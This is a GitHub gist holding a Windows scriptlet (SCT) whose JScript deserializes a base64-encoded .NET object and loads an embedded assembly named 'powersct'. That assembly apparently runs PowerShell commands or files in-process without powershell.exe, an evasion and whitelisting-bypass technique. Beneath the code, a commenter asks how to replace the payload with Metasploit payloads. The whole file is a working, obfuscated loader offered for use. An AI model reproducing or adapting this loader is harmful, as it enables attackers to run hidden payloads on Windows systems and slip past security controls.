Skip to content

Instantly share code, notes, and snippets.

@NickTyrer
Last active April 9, 2024 17:06
Show Gist options
  • Save NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f to your computer and use it in GitHub Desktop.
Save NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
language="JScript"><![CDATA[function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs8cdWQAAAAAA"+
"AAAA4AACAQsBMAAADgAAAAgAAAAAAAAuLQAAACAAAABAAAAAAEAAACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CwA"+
"AE8AAAAAQAAArAUAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQrAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAA0DQAAACAAAAAOAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAArAUAAABA"+
"AAAABgAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABAtAAAAAAAASAAAAAIABQC4IQAA7AkAAAMAAAABAAAG"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIgAoAwAABiYq"+
"PgIoDgAACgAAKAMAAAYmKgAAABswAgBSAAAAAQAAEQArSgAoCAAABiYSAB0oDwAACh/1KAYAAAYL"+
"cgEAAHAoEAAACgAoEQAACgwACCgEAAAGKBIAAAoAAN4RDQAJbxMAAAooEgAACgAA3gAAFxMEK7EA"+
"AAEQAAAAACsAEDsAERAAAAEbMAIAmgAAAAIAABEAKBQAAAoKBm8VAAAKAAZzFgAACgsGbxcAAAoM"+
"CG8YAAAKAm8ZAAAKAAhvGAAACnILAABwbxoAAAoACG8bAAAKDQZvHAAACgBzHQAAChMEAAlvHgAA"+
"ChMFKxURBW8fAAAKEwYAEQQRBm8gAAAKJgARBW8hAAAKLeLeDREFLAgRBW8iAAAKANwRBG8jAAAK"+
"byQAAAoTBysAEQcqAAABEAAAAgBYACJ6AA0AAAAAEzACABUAAAADAAARACglAAAKCgYCbyYAAApv"+
"JwAACiYqAAAAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAdAMAACN+AADgAwAA"+
"cAQAACNTdHJpbmdzAAAAAFAIAAAkAAAAI1VTAHQIAAAQAAAAI0dVSUQAAACECAAAaAEAACNCbG9i"+
"AAAAAAAAAAIAAAFXHQIcCQAAAAD6ATMAFgAAAQAAAB8AAAACAAAAAQAAAAgAAAAGAAAAJwAAAAEA"+
"AAANAAAAAwAAAAIAAAACAAAAAwAAAAEAAAACAAAAAACAAgEAAAAAAAYA9QHJAwYAYgLJAwYAQgFj"+
"Aw8A6QMAAAYAagEAAwYA2AEAAwYAuQEAAwYASQIAAwYAFQIAAwYALgIAAwYAgQEAAwYAVgGqAwYA"+
"NAGqAwYAnAEAAwYAHATNAgYAJAPNAgoAdACDAwoAiQDjAgoAEAGDAwYAAQCWAgoAGgTjAgYALgNS"+
"BAYADgA3AAoAwgLjAgYAXAPNAgYA7wDNAgoAXgSDAwoAEgODAwYAPAP9AwYAmADNAgYAjwLNAgAA"+
"AAAlAAAAAAABAAEAAQAQABAEAAA9AAEAAQBRgMkAtgBQIAAAAACRAN4CuQABAFkgAAAAAIYYVgMG"+
"AAIAbCAAAAAAlgAjBL8AAgDcIAAAAACWAFoAwwACAJQhAAAAAJYA4AAkAAMAAAAAAIAAkSCvAMgA"+
"BAAAAAAAgACRILwAzQAFAAAAAACAAJEg6gC/AAcAAAABAPgDAAABAFYAAAABAEIEAAABAKQAAAAB"+
"AKQAAAACANkACQBWAwEAEQBWAwYAGQBWAwoAKQBWAxAAMQBWAxAAOQBWAxAAQQBWAxAASQBWAxAA"+
"UQBWAxAAWQBWAxAAYQBWAxUAaQBWAxAAcQBWAxAAeQBWAwYAyQBWAwEA0QAuASQA0QD3ACkA0QAA"+
"ASQAgQB9AC0A2QBuAEsAiQDZAgYAkQBWA1AAiQAKAVYAmQB2A1sA4QA4BBAA4QBSABAAmQCRAGAA"+
"iQAZAQYAsQBWAwYADABIA3AAFAAsBIAAsQBnAIUA6QBJBIsA8QAfAQYAeQCNAi0A+QDUAi0AwQAn"+
"AZQAwQA4BJkAwQCRAGAACQAEALEALgALANMALgATANwALgAbAPsALgAjAAQBLgArABIBLgAzABIB"+
"LgA7ABIBLgBDAAQBLgBLABgBLgBTABIBLgBbABIBLgBjADABLgBrAFoBGgAxAI8AtQIcAGkAeQAA"+
"AQ0ArwABAAABDwC8AAEAAAERAOoAAgAEgAAAAQAAAAAAAAAAAAAAAAAjBAAAAgAAAAAAAAAAAAAA"+
"nwAuAAAAAAABAAAAAAAAAAAAAACoAOMCAAAAAAAAAAAAQ29sbGVjdGlvbmAxAElFbnVtZXJhdG9y"+
"YDEAa2VybmVsMzIAPE1vZHVsZT4AbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMA"+
"QWRkAGNtZABSdW5QU0NvbW1hbmQAQXBwZW5kAENyZWF0ZVJ1bnNwYWNlAGdldF9NZXNzYWdlAFJ1"+
"bnNwYWNlSW52b2tlAElEaXNwb3NhYmxlAG5TdGRIYW5kbGUAR2V0U3RkSGFuZGxlAFNldFN0ZEhh"+
"bmRsZQBTdGRPdXRwdXRIYW5kbGUAaGFuZGxlAFJ1blBTRmlsZQBBbGxvY0NvbnNvbGUAUmVhZExp"+
"bmUAV3JpdGVMaW5lAENyZWF0ZVBpcGVsaW5lAENsb3NlAERpc3Bvc2UAQ3JlYXRlAFdyaXRlAEd1"+
"aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2Vt"+
"Ymx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxl"+
"VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlE"+
"ZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2Vt"+
"Ymx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"bXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcG93ZXJzY3QuZXhl"+
"AFRvU3RyaW5nAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbABrZXJuZWwzMi5kbGwAUG93"+
"ZXJTaGVsbABTeXN0ZW0AVHJpbQBPcGVuAE1haW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlv"+
"bgBTeXN0ZW0uUmVmbGVjdGlvbgBDb21tYW5kQ29sbGVjdGlvbgBFeGNlcHRpb24AU3RyaW5nQnVp"+
"bGRlcgBJRW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25v"+
"c3RpY3MAZ2V0X0NvbW1hbmRzAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2Vz"+
"AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNl"+
"cnZpY2VzAERlYnVnZ2luZ01vZGVzAGFyZ3MAU3lzdGVtLkNvbGxlY3Rpb25zAFRlc3RDbGFzcwBQ"+
"U09iamVjdABwb3dlcnNjdABnZXRfQ3VycmVudABBZGRTY3JpcHQAc2NyaXB0AE1vdmVOZXh0AFN5"+
"c3RlbS5UZXh0AFJ1bnNwYWNlRmFjdG9yeQAAAAAJUABTACAAPgAAFU8AdQB0AC0AUwB0AHIAaQBu"+
"AGcAAQAAABfFYPPntspHpLkoVG2NjN4ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYDhJB"+
"AgIEAAEBDgMAAA4DIAAOGQcIEkUSSRJNFRJRARJVElkVEl0BElUSVQ4EAAASRQUgAQESRQQgABJN"+
"BCAAEnEIIAAVElEBElUGFRJRARJVCCAAFRJdARMABhUSXQESVQQgABMABSABElkcAyAAAgQHARJh"+
"BAAAEmEFIAESYQ4It3pcVhk04IkIMb84Vq02TjUE9f///wIGCQUAAQEdDgMAAAIEAAEODgQAARgJ"+
"BQACAQkYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA0B"+
"AAhwb3dlcnNjdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDUxM2QwODYxLWRj"+
"ZmYtNDUwNi04ZTEzLWFmNDMyOWZiMWQ4YQAADAEABzEuMC4wLjAAAAAAAAAAs8cdWQAAAAACAAAA"+
"HAEAAMArAADADQAAUlNEUwz589HWFFROlbOenzlxcdkBAAAAQzpcVXNlcnNcSUVVc2VyXERvY3Vt"+
"ZW50c1xWaXN1YWwgU3R1ZGlvIDIwMTVcUHJvamVjdHNccG93ZXJzY3RccG93ZXJzY3Rcb2JqXHg4"+
"NlxEZWJ1Z1xwb3dlcnNjdC5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAELQAAAAAAAAAAAAAeLQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEC0AAAAA"+
"AAAAAAAAAABfQ29yRXhlTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIEAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAA"+
"AAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEA"+
"AQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAKwDAACQQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBT"+
"AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
"AAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
"ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYA"+
"aQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBu"+
"AHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA6AAkAAQBGAGkA"+
"bABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAcABvAHcAZQByAHMAYwB0AAAAAAAwAAgAAQBG"+
"AGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA6AA0AAQBJAG4AdABlAHIA"+
"bgBhAGwATgBhAG0AZQAAAHAAbwB3AGUAcgBzAGMAdAAuAGUAeABlAAAAAABIABIAAQBMAGUAZwBh"+
"AGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcA"+
"AAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEIADQABAE8AcgBp"+
"AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABwAG8AdwBlAHIAcwBjAHQALgBlAHgAZQAAAAAA"+
"MgAJAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABwAG8AdwBlAHIAcwBjAHQAAAAAADQACAAB"+
"AFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMA"+
"cwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAALxDAADqAQAAAAAA"+
"AAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0i"+
"eWVzIj8+DQoNCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20u"+
"djEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0i"+
"MS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0i"+
"dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAg"+
"IDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFz"+
"bS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2Vy"+
"IiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8"+
"L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
"dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
} catch (e) {
debug(e.message);
}]]></script>
</registration>
</component>
</package>
@Haunted-Banshee
Copy link

How can I replace the base64 payloads with the Metasploit payloads?

@NickTyrer
Copy link
Author

NickTyrer commented Dec 29, 2019 via email

@Haunted-Banshee
Copy link

I still don't understand. I wonder if you can give me an order. Let me have a look

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment